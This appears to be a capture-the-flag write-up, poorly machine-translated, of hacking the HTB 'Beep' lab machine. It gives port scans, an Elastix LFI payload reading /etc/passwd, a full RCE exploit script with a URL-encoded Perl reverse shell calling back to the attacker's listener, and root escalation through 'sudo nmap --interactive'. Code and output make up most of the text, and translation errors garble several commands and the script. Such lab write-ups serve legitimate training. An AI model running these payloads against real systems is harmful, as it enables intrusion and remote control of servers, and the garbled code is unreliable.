disclaimer
The hosts infiltrated in this article are legally authorized. The tools and methods used in this article are only for learning and communication. Please do not use the tools and infiltration ideas used in this article for any illegal purposes. I am not responsible for any consequences arising therefrom, nor for any misuse or damage caused.
Service to detect
Chrysene ─(root💀kali)-[~/ HTB /Beep] ├ ─# nmap-SV-pn 10.10.10.7-p-130 ⨯ Host discovery disabled (-pn). All addresses will be Starting Nmap 7.91 (https://nmap.org) at 2021-12-09 01:07 EST Nmap scan marked 'up' and scan times will be slower Report for 10.10.10.7 Host is up (0.33s latency). Not shown: 65519 Closed ports PORT STATE SERVICE VERSION 22/ TCP OpenSSH OpenSSH 4.3 (Protocol 2.0) 25/ TCP Open SMTP Postfix SMTPD 80/ TCP open HTTP Apache HTTPD 2.2.3 110/ TCP open POP3 Cyrus pop3D 2.3.7-invoca-rpm-2.3.7-7.el5_6.4111 / TCP open rpcbind 2 (RPC #100000) 143/ TCP open imap Cyrus imapd 2.3.7-invoca-rpm-2.3.7-7.el5_6.4443 / TCP open SSL/HTTPS? 879/ TCP open status 1 (RPC #100024) 993/tcp open ssl/imap Cyrus imapd 995/tcp open pop3 Cyrus pop3d 3306/tcp open mysql MySQL (Unauthorized) 4190/ TCP Open Sieve Cyrus Timsieved 2.3.7-invoca-rpM-2.3.7-7.el5_6.4 (included W/Cyrus imap) 4445/ TCP Open UpNotification? 4559/ TCP Open hylafax hylafax 4.3.10 5038/ TCP Open Asterisk Asterisk Call Manager 1.1 10000/ TCP open HTTP MiniServ 1.570 (Webmin HTTPD) Service Info: Hosts: beep.localdomain, 127.0.0.1, example.com, localhost; OS: Unix Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 Host up) Scanned in 1565.01 secondsCopy the codeIn reality, the more ports there are, the more loopholes there are. However, when it comes to these targets, it is likely to mean many rabbit holes, so we must be careful to distinguish them when enumerating
Use goBuster to blow up port 80 directory first, need to add -k to skip SSL authentication
Directory of blasting
Chrysene ─(root💀kali)-[~/dirsearch] ├ ─# gobuster dir -w /usr/share/wordlists/ web-content /common.txt -k-u https://10.10.10.7/ -- wildcard = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = Gobuster v3.1.0 by OJ Reeves (@ TheColonial) & Christian Mehlmauer (@firefart) =============================================================== [+] Url: https://10.10.10.7/ [+] Method: GET [+] Threads: 10 [+] Wordlist: /usr/share/wordlists/ web-content /common.txt [+] Negative Status codes: 404 [+] User Agent: GoBuster /3.1.0 [+] Timeout: 10s =============================================================== 2021/12/09 02:53:35 Starting gobuster in directory enumeration mode =============================================================== /.hta (Status: 403) [Size: 282] /.htaccess (Status: 403) [Size: 287] /.htpasswd (Status: 403) [Size: 287] /admin (Status: 301) [Size: [309] -- > https://10.10.10.7/admin/] / cgi - bin/(Status: 403) [Size: 286] the Progress: 1041/4686 (22.22%) [ERROR] 2021/12/09 02:56:30 [!] Get "https://10.10.10.7/certs" : context deadline exceeded (Client.Timeout exceeded while awaiting headers) /configs (Status: 301) [Size: [311] -- > https://10.10.10.7/configs/] / favicon. Ico (Status: 200) [Size: 894] / help (Status: 301) [Size: [308] -- > https://10.10.10.7/help/] / images (Status: 301) [Size: [310] -- > https://10.10.10.7/images/] / index. The PHP (Status: 200) [Size: 1785] / lang (Status: 301) [Size: [308] -- > https://10.10.10.7/lang/] / libs (Status: 301) [Size: 308] [-- -- > https://10.10.10.7/libs/] / mail (Status: 301) [Size: 308] [--> https://10.10.10.7/mail/] /modules (Status: 301) [Size: [311] -- > https://10.10.10.7/modules/] / panel (Status: 301) [Size: [309] -- > https://10.10.10.7/panel/] / robots. TXT (Status: 200) [28] Size: / static (Status: 301) [Size: [310] -- > https://10.10.10.7/static/] Progress: 3959/4686 (84.49%) [ERROR] 2021/12/09 03:02:55 [!] Get "https://10.10.10.7/status" : context, deadline exceeded (Client) Timeout exceeded while awaiting headers) Progress: 3986/4686 (85.06%) [ERROR] 2021/12/09 03:03:04 [!] Get "https://10.10.10.7/style_captcha" : context deadline exceeded (Client.Timeout exceeded while awaiting headers) Progress: 4036/4686 (86.13%) [ERROR] 2021/12/09 03:03:19 Get "https://10.10.10.7/swfobject.js" : context deadline exceeded (Client.Timeout exceeded while awaiting headers) /themes (Status: 301) [Size: [310] -- > https://10.10.10.7/themes/] / var (Status: 301) [Size: 307] [-- -- > https://10.10.10.7/var/]Copy the code– Port 80 service is running a CMS called Elastix, there is a LFI bug in this CMS, refer to exp
Verify the POC as follows
https://10.10.10.7/vtigercrm/graph.php?current_language=.. /.. /.. /.. /.. /.. /.. /.. //etc/passwd%00&module=Accounts&actionCopy the codePages to print
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash
distcache:x:94:94:Distcache:/:/sbin/nologin
vcsa:x:69:69:virtual console memory
owner:/dev:/sbin/nologin
pcap:x:77:77::/var/arpwatch:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
cyrus:x:76:12:Cyrus
IMAP Server:/var/lib/imap:/bin/bash
dbus:x:81:81:System message bus:/:/sbin/nologin
apache:x:48:48:Apache:/var/www:/sbin/nologin
mailman:x:41:41:GNU Mailing List Manager:/usr/lib/mailman:/sbin/nologin
rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
asterisk:x:100:101:Asterisk VoIP PBX:/var/lib/asterisk:/bin/bash
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
spamfilter:x:500:500::/home/spamfilter:/bin/bash
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin
fanis:x:501:501::/home/fanis:/bin/bash
Sorry! Attempt to access restricted file.
Copy the codeOk, verify that a vulnerability exists. Users: Asterisk, Spamfilter, fanis
You can read user.txt for the payload
https://10.10.10.7/vtigercrm/graph.php?current_language=.. /.. /.. /.. /.. /.. /.. /.. //home/fanis/user.txt%00&module=Accounts&actionCopy the codeLFI usually requires a combination of upload vulnerability or file parsing vulnerability to get webshell, but I did not find the upload portal, and I could not find apache’s access_log file
The initial shell
Then I continued to search the CMS exploit and found another RCE, and found the exploit script on Github
This script will be executed locally with these two lines:
ctx.set_ciphers('HIGH:! DH:! aNULL') ctx.set_ciphers('DEFAULT@SECLEVEL=1')Copy the codeOtherwise, an SSL error may be reported
The full exp is as follows:
Exploit modified by infosecjunky #https://infosecjunky.com import urllib2 import SSL rhost="10.10.10.7" SSLContext(SSL.protocol_TLsv1) ctx.check_hostname = False ctx.verify_mode = ssl.CERT_NONE ctx.set_ciphers('HIGH:! DH:! aNULL') ctx.set_ciphers('DEFAULT@SECLEVEL=1') # Reverse shell payload url = 'https://'+str(rhost)+'/recordings/misc/callme_page.php? action=c&callmenum='+str(extension)+'@from-internal/n%0D%0AApplication:%20system%0D%0AData:%20perl%20-MIO%20-e%20%27%24p %3dfork%3bexit%2cif%28%24p%29%3b%24c%3dnew%20IO%3a%3aSocket%3a%3aINET%28PeerAddr%2c%22'+str(lhost)+'%3a'+str(lport)+'%22 %29%3bSTDIN-%3efdopen%28%24c%2cr%29%3b%24%7e-%3efdopen%28%24c%2cw%29%3bsystem%24%5f%20while%3c%3e%3b%27%0D%0A%0D%0A' urllib2.urlopen(url,context=ctx)Copy the codeGet a webshell
├ ─# nc - LNVP 4455 listening on [any] 4455... Connect to [10.10.14.16] from (UNKNOWN) [10.10.10.7] 49229 ID UID =100(asterisk) GID =101(asterisk) whoami AsteriskCopy the codeRight to mention
Python switch tty
python -c ‘import pty; pty.spawn(“/bin/sh”)’
View sudo privileges
Sh -3.2$sudo-l sudo-l Matching Defaults entries for asterisk on this host: env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE INPUTRC KDEDIR LS_COLORS MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY" User asterisk may run the following commands on this host: (root) NOPASSWD: /sbin/shutdown (root) NOPASSWD: /usr/bin/nmap (root) NOPASSWD: /usr/bin/yum (root) NOPASSWD: /bin/touch (root) NOPASSWD: /bin/chmod (root) NOPASSWD: /bin/chown (root) NOPASSWD: /sbin/service (root) NOPASSWD: /sbin/init (root) NOPASSWD: /usr/sbin/postmap (root) NOPASSWD: /usr/sbin/postfix (root) NOPASSWD: /usr/sbin/saslpasswd2 (root) NOPASSWD: /usr/sbin/hardware_detector (root) NOPASSWD: /sbin/chkconfig (root) NOPASSWD: /usr/sbin/elastix-helperCopy the codeSelect nmap to raise permissions to root
$sudo /usr/bin/nmap --interactive sudo /usr/bin/nmap --interactive Starting nmap v.4.11 ( http://www.insecure.org/nmap/ ) Welcome to Interactive Mode -- press h <enter> for help nmap> ! sh ! Sh sh-3.2# id id uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel) sh-3.2# whoami Whoami root sh # 3.2Copy the codeconclusion
Very simple target machine, the initial shell spent some time, after searching for a long time access. Log root found in this location:
Sh -3.2# find / -name access_log find / -name access_log /var/log/httpd/access_logCopy the codeHowever, the Web account does not have read permission
Sh -3.2$id ID UID =100(asterisk) gid=101(asterisk) sh-3.2$cat /var/log/httpd/access_log cat /var/log/httpd/access_log cat: /var/log/httpd/access_log: Permission deniedCopy the codeWatch out for these rabbit holes.